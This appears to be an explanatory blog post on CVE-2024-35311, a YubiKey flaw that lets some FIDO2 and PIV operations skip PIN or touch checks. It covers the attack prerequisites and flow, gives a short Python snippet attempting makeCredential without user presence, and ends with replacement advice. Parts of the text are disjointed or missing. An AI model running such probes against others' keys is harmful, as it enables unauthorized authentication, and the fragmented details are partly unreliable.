On May 2024, a major security vulnerability—CVE-2024-35311—was published in several Yubico hardware security tokens, notably the YubiKey 5 Series, Security Key Series, YubiKey Bio, and YubiKey 5 FIPS lines. These devices, bought and trusted by millions for 2FA, passwordless login, and cryptographic operations, are fundamental building blocks of personal and enterprise security. Unfortunately, a flaw in access control left particular versions at risk and in certain eras likely exploitable.

This post digs deep into CVE-2024-35311, uses easy-to-understand language, and walks through what went wrong, how it could be exploited, and what you can do to stay safe. Let’s dive in.

YubiKey 5 FIPS before v5.7.2

If you have a newer version, you’re safe. But if your device is older and unpatched, you need to act!

References

- NVD CVE-2024-35311 Detail
- Yubico Security Advisory YSA-2024-05

The Technical Gist: Incorrect Access Control

“Incorrect access control” is a generic term for any situation where a device or software fails to block the wrong people from getting sensitive access. In this case, the affected YubiKeys didn't correctly enforce certain permissions for operations using their FIDO2 (CTAP) and PIV (Personal Identity Verification) applications.

Yubico’s security advisory describes the issue as

> “Certain authentication operations could be performed without correct verification of user presence or PIN, enabling unauthorized usage under specific scenarios.”

What That Means

- Normally, important actions—like fetching secrets, signing data, or authenticating—should require you to touch the YubiKey or enter a PIN.

Pre-requisites

- Physical/Logical Access to Your Machine: The attacker needs to communicate with your plugged-in YubiKey, typically on a system you’ve logged into, with your key inserted.
- An Application or Code: The attacker puts a specially crafted script or malicious app on your system.

Attack Flow

1. Insert Victim’s YubiKey into a compromised machine or leave it plugged during a phishing session.

The Exploit Code communicates with the YubiKey using FIDO2 or PIV commands.

3. The Key Fails to Check for required user interaction (PIN/tap) for certain actions.
4. Attacker extracts secrets (like credentials, signatures), or performs unauthorized authentications without your knowledge.

> Important: The attacker cannot do this remotely, but if your workstation is hijacked or you leave your YubiKey plugged in on a risky system, you’re vulnerable.

The Exploit — in Simple Code

Suppose the attacker uses Python with the fido2 and pycryptodome libraries. Here’s an oversimplified code sample to demonstrate interacting with a plugged-in YubiKey and issuing FIDO2 commands without waiting for a finger touch or PIN entry:

from fido2.hid import CtapHidDevice
from fido2.ctap2 import CTAP2

# Find the first USB FIDO2 device (could be a YubiKey)
for dev in CtapHidDevice.list_devices():
    ctap2 = CTAP2(dev)
    # Try to get info (harmless)
    print("Device Info:", ctap2.get_info())
    
    # Try to makeCredential without user presence or PIN
    try:
        result = ctap2.make_credential({
            "clientDataHash": b"\x00"*32,
            "rp": {"id": "example.com"},
            "user": {"id": b"user", "name": "attacker"},
            "pubKeyCredParams": [{"type": "public-key", "alg": -7}]
        })
        print("Credential Created:", result)
    except Exception as ex:
        print("Failed or required interaction:", ex)

Attempts to create a new FIDO2 credential without user presence or PIN.

- On *vulnerable keys*, may succeed without you having to tap or enter a PIN! (On patched keys, the operation is blocked or requires interaction.)

References

- fido2 Python module

May 2024: Researchers identify and privately disclose the flaw to Yubico.

- Late May 2024: Yubico issues patched firmware for all lines.

Firmware can't be upgraded at home — replace it!

- Order from Yubico or seek a warranty replacement.

Mitigations

- Don’t leave your key plugged into shared/public computers.

Summary

CVE-2024-35311 was a serious, invisible security weakness in Yubico’s trusted YubiKey hardware tokens, letting attackers bypass required verification for some sensitive key operations on older firmware. This flaw required local or malware access, but if exploited, it could have allowed account takeover, credential extraction, or digital signature spoofing.

The only full fix is to replace your device with one running updated firmware, which solves the access control enforcement. If you rely on YubiKey for passwordless, 2FA, or cryptographic signing, don’t delay—check your firmware and take action now.

Original References for Further Reading

- NVD CVE-2024-35311
- Yubico Security Advisory YSA-2024-05
- python-fido2 on GitHub (Official)
- Yubico Device Firmware Guides

Timeline

Published on: 05/29/2024 16:15:10 UTC
Last modified on: 11/21/2024 17:15:13 UTC